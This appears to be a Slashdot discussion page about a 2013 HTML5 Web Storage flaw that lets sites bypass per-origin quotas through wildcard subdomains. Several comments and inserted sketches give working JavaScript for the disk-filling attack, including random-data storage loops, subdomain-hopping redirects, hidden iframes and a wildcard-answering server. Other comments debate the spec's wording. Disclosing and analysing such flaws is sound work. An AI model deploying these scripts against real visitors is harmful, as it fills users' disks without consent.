
HTML5 Storage Bug Can Fill Your Hard Drive

Dystopian Rebel writes "A Stanford comp-sci student has found a serious bug in Chromium, Safari, Opera, and MSIE. Feross Aboukhadijeh has demonstrated that these browsers allow unbounded local storage. 'The HTML5 Web Storage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB). ... The current limits are: 2.5 MB per origin in Google Chrome, 5 MB per origin in Mozilla Firefox and Opera, 10 MB per origin in Internet Explorer. However, what if we get clever and make lots of subdomains like 1.filldisk.com, 2.filldisk.com, 3.filldisk.com, and so on? Should each subdomain get 5MB of space? The standard says no. ... However, Chrome, Safari, and IE currently do not implement any such "affiliated site" storage limit.' Aboukhadijeh has logged the bug with Chromium and Apple, but couldn't do so for MSIE because 'the page is broken' (see http://connect.microsoft.com/IE). Oops. Firefox's implementation of HTML5 local storage is not vulnerable to this exploit."
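
To make the mechanics concrete, here is a minimal JavaScript sketch of the fill-and-hop pattern the summary describes. The domain is a placeholder standing in for something like filldisk.com with a wildcard DNS record, and the chunk size is an arbitrary illustration; this is a sketch of the reported technique, not Aboukhadijeh's actual code.

    // Sketch only: fill this origin's Web Storage quota with locally generated
    // junk, then hop to the next numbered subdomain, which gets a fresh quota.
    // "filldisk.example" is a placeholder; a wildcard DNS record is assumed.
    var chunk = new Array(1024 * 1024 + 1).join("a"); // roughly 1 MB per key
    try {
      for (var i = 0; ; i++) {
        localStorage.setItem("chunk-" + i, chunk);   // throws once the 2.5-10 MB quota is hit
      }
    } catch (quotaExceeded) {
      var n = parseInt(location.hostname, 10) || 0;  // e.g. "3.filldisk.example" -> 3
      location.href = "http://" + (n + 1) + ".filldisk.example/";
    }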
  • Re:Bug, or exploit? (Score:5, Informative)

    by DarkRat ( 1302849 ) on Thursday February 28, 2013 @12:18PM (#43035371)
    no. it's a bug. the HTML5 spec clearly states that this exact behaviour should be looked out for and blocked
  • by The Mighty Buzzard ( 878441 ) on Thursday February 28, 2013 @12:24PM (#43035485)
    Really? You've never admin'd a dns server then. It's trivial to have one respond to wildcard subdomain names that you could generate dynamically on page load with one line of javascript.
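    For illustration, the kind of one-liner being described, assuming a wildcard DNS record for a hypothetical domain; with a wildcard, the generated name does not even have to follow a pattern:

        // One line: jump to a freshly invented subdomain; wildcard DNS makes any name resolve.
        location.href = "http://" + Math.random().toString(36).slice(2) + ".filldisk.example/";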
  • by arth1 ( 260657 ) on Thursday February 28, 2013 @12:38PM (#43035711) Homepage Journal

    It doesn't take much work or time to set up a wildcard CNAME entry pointing to a single web server that answers a wildcard. You now have billions of subdomains with a couple of minutes of work.
    The web instance serves a short javascript which generates a boatload of data on the client side, and then calls a random subdomain to reload the js with a new domain name.

    All this can be linked to a single ad (or blog comment, for vulnerable boards that allow css exploits).
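
    The server side of this really is small. A hedged sketch in Node.js (hypothetical names; the wildcard CNAME such as *.filldisk.example pointing at this host is assumed to exist already):

        // One tiny server answers every subdomain identically, so "billions of
        // subdomains" add no hosting cost. The Host header changes on each request
        // (1.filldisk.example, 2.filldisk.example, ...) but the ~1 KB response does not.
        var http = require("http");

        var page = "<!doctype html><title>demo</title>" +
                   "<script>/* client-side fill-and-hop script goes here */</script>";

        http.createServer(function (req, res) {
          res.writeHead(200, { "Content-Type": "text/html" });
          res.end(page);
        }).listen(8080);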

  • by Anonymous Coward on Thursday February 28, 2013 @12:41PM (#43035733)

    "... transfer a lot of data and incur bandwidth charges ..."

    Posting anonymously since this shows how it could be done.

    I don't see any need to transfer data. Simply generate random strings programmatically. One could easily write a few lines of code. The storage API is a 'key' and 'value' system, so just randomly generate keys and randomly generate values in a loop. Super easy. For the subdomain stuff, like others have said, wildcard for DNS. Then just serve the small js file that runs, then programmatically generates a new random subdomain to dynamically load the js file again.

    The end point is that you don't need a lot of data bandwidth to screw up someone's computer.
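
    A sketch of those few lines, with arbitrary key and value sizes; everything below is generated on the client, so the attacker's only bandwidth cost is serving the script itself:

        // Generate a random alphanumeric string of the requested length locally.
        function randomString(length) {
          var s = "";
          while (s.length < length) {
            s += Math.random().toString(36).slice(2);
          }
          return s.slice(0, length);
        }

        // Fill this origin's storage with randomly generated keys and values;
        // nothing is downloaded, so no meaningful data transfer is involved.
        try {
          while (true) {
            localStorage.setItem(randomString(16), randomString(64 * 1024)); // ~64 KB values
          }
        } catch (e) {
          // Quota exhausted for this origin; a new subdomain would get a fresh one.
        }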

  • by DragonWriter ( 970822 ) on Thursday February 28, 2013 @12:58PM (#43035935)

    no. it's a bug. the HTML5 spec clearly states that this exact behaviour should be looked out for and blocked

    It's not a bug. While the Web Storage API Candidate Recommendation (related to, but not part of, the HTML5 spec) says both that user agents should set a per-origin storage limit and that they should identify and prevent use of "origins of affiliated sites" to circumvent that limit, it doesn't specify what constitutes an "affiliated site", and neither of those things it says "should" be done is a requirement of the specification. "Should" has a quite specific meaning in the specification (defined by reference to RFC2119 [ietf.org]), and it's not the same as "must":

    SHOULD This word, or the adjective "RECOMMENDED", mean that there may exist valid reasons in particular circumstances to ignore a particular item, but the full implications must be understood and carefully weighed before choosing a different course.

    So, it's both a recommendation rather than a requirement, and not specified clearly enough to be implemented. There are some cases where origins under the same second-level domain are meaningfully affiliated, and some where they are not (for a clear case of the latter, consider subdomains of ".co.uk"). It's pretty clear that origins which differ only in protocol are almost always going to be affiliated under any reasonable definition (e.g., http://www.example.com/ [example.com] and https://www.example.com/ [example.com], which are different origins), but no automatic identification of origin affiliation by subdomain can be done without understanding per-domain policies from the TLD down to the first level at which all subdomains are affiliated. (And this is a problem which will only get worse with the planned explosion of TLDs.)
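
    To see why this is hard to automate, consider what a browser would need in order to group "affiliated" origins by registrable domain: knowledge of where the public suffix ends, which the spec does not supply. The toy suffix table and the getRegistrableDomain helper below are purely illustrative, not anything defined by the standard:

        // Illustrative only: the suffix table is a toy stand-in for a real Public
        // Suffix List, and getRegistrableDomain is a hypothetical helper.
        var publicSuffixes = { "com": true, "org": true, "co.uk": true };

        function getRegistrableDomain(hostname) {
          var labels = hostname.split(".");
          for (var i = 1; i < labels.length; i++) {
            if (publicSuffixes[labels.slice(i).join(".")]) {
              return labels.slice(i - 1).join("."); // keep one label beyond the suffix
            }
          }
          return hostname;
        }

        // Subdomains of one site collapse to the same group...
        getRegistrableDomain("1.filldisk.com");  // "filldisk.com"
        getRegistrableDomain("2.filldisk.com");  // "filldisk.com"
        // ...but unrelated sites under a shared suffix must not:
        getRegistrableDomain("alice.co.uk");     // "alice.co.uk"
        getRegistrableDomain("bob.co.uk");       // "bob.co.uk"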

  • by DragonWriter ( 970822 ) on Thursday February 28, 2013 @01:43PM (#43036587)

    You must be awful fun when talking to customers. They tend not to understand the distinction between "shall" and "should".

    There is a reason why internet specifications (whether or not they are from IETF, and often whether or not they are even intended as standards-track) reference the RFC2119 definitions. "MUST" vs. "SHOULD" is an important distinction.

    In this particular case, what's even more important is that the recommended functionality at issue isn't defined at all: there is just one example given -- and that example doesn't fully specify the origins, so it's incomplete -- with no definition of the parameters for identifying "affiliated origins". So if it were a "MUST", it would be a broken standard (since it would be impossible to assess conformance), and as it is, it's impossible to say whether a particular implementation even implements the recommended functionality.

    "there may exist valid reasons in particular circumstances to ignore a particular item" - in other words, this is a case where the feature should ALWAYS be applied to generic software because that must deal with all circumstances, not just "particular" ones

    Any particular user agent is a "particular circumstance" (it is specific software with a specific use case within the scope of all possible kinds of user agents which might implement the Web Storage API); there is no such thing as an implementation that must deal with "all circumstances".

    It really should not be hard to have a popup that says "This web page wants to create local storage on your computer allow/disallow"

    It's not at all hard, but that's not related to the recommendation to implement per-origin quotas, or to the further recommendation to build on top of per-origin quotas to detect and limit the use of "affiliated origins" to circumvent them, which is what is at issue here. Per-origin allow/disallow for Web Storage use isn't even a recommendation of the specification. (Though it is explicitly permitted behavior.)

  • by TheRaven64 ( 641858 ) on Thursday February 28, 2013 @01:58PM (#43036769) Journal
    You misunderstand how the attack works. The client-side code is allowed to store 5-10MB per domain, but it can generate this data itself (Math.random() will do it fine). The per-domain limit means that you need one HTTP request per 5-10MB, but on the server that is just a wildcard DNS entry always resolving to the same host. If you set the cache headers with a sufficiently long timeout, then you can probably have a single site hosting the .js (so the browser will only request it once) and then just send a tiny HTML page referencing it. The JavaScript then creates a new iframe with a new (random) subdomain as the target, so each HTTP request to your server (about 1 KB of traffic in total) generates 5-10MB of data on the client's hard disk.
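    A hedged sketch of the parent-page side of that variant (hypothetical domain, wildcard DNS assumed; each framed page would run its own quota-filling script, ideally served with long cache headers so it is only fetched once):

        // Keep spawning hidden iframes, each on a fresh subdomain and therefore a
        // fresh origin with its own 5-10 MB quota. Each new origin costs the server
        // roughly one small HTML response, while the client writes megabytes to disk.
        function spawnNextFrame() {
          var frame = document.createElement("iframe");
          frame.style.display = "none";
          frame.src = "http://" + Math.random().toString(36).slice(2) + ".filldisk.example/";
          document.body.appendChild(frame);
        }
        setInterval(spawnNextFrame, 3000); // one new origin every few seconds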
  • by Anonymous Coward on Thursday February 28, 2013 @02:23PM (#43037103)

    If you don't like "nearly infinite", it might be better to avoid saying things like "a billionth of a billionth of infinite", and even "infinity minus seven", without giving some sort of definition of what you're talking about. If you mean cardinals, then the values you appear to be talking about are trivially the same as the infinite cardinal you started with. If you mean ordinals, it doesn't look like there's any well-defined thing that corresponds to the phrases you're using.

    Your best bet might be to read up on hyperreals, because in that system expressions like r - 7 and r * 10^-18 do actually make some non-trivial sense where r is infinite, and your intuition is correct that there's no sensible definition of a "nearly infinite" hyperreal. But until you have some understanding of the transfer principle, or at least are familiar with the basic properties of the hyperreals, you'd be well advised to avoid such expressions, especially if you're math-naziing against everyday expressions like "nearly infinite" whose intended meaning is entirely clear. Take a look at this [mathforum.org] (or at this [princeton.edu] if you're more mathematically trained).

    Not trolling -- you're obviously interested in mathematics -- just pointing your enthusiasm in a useful direction :-)
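
    To make the hyperreal point above concrete, a short illustration in LaTeX notation (standard nonstandard-analysis facts, stated here only to show why the quoted expressions do make sense in that setting):

        % Let H be a positive infinite hyperreal, i.e. H > n for every natural number n.
        % Then H - 7 and 10^{-18} H are still infinite, yet strictly smaller than H:
        \[
          H - 7 > n \ \text{ and } \ 10^{-18}H > n \quad \text{for every } n \in \mathbb{N},
          \qquad\text{while}\qquad H - 7 < H \ \text{ and } \ 10^{-18}H < H .
        \]
        % There is no boundary element to call "nearly infinite": if x is finite then
        % x + 1 is finite, and if H is infinite then H/2 is a smaller infinite hyperreal.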

"Experience has proved that some people indeed know everything." -- Russell Baker

Working...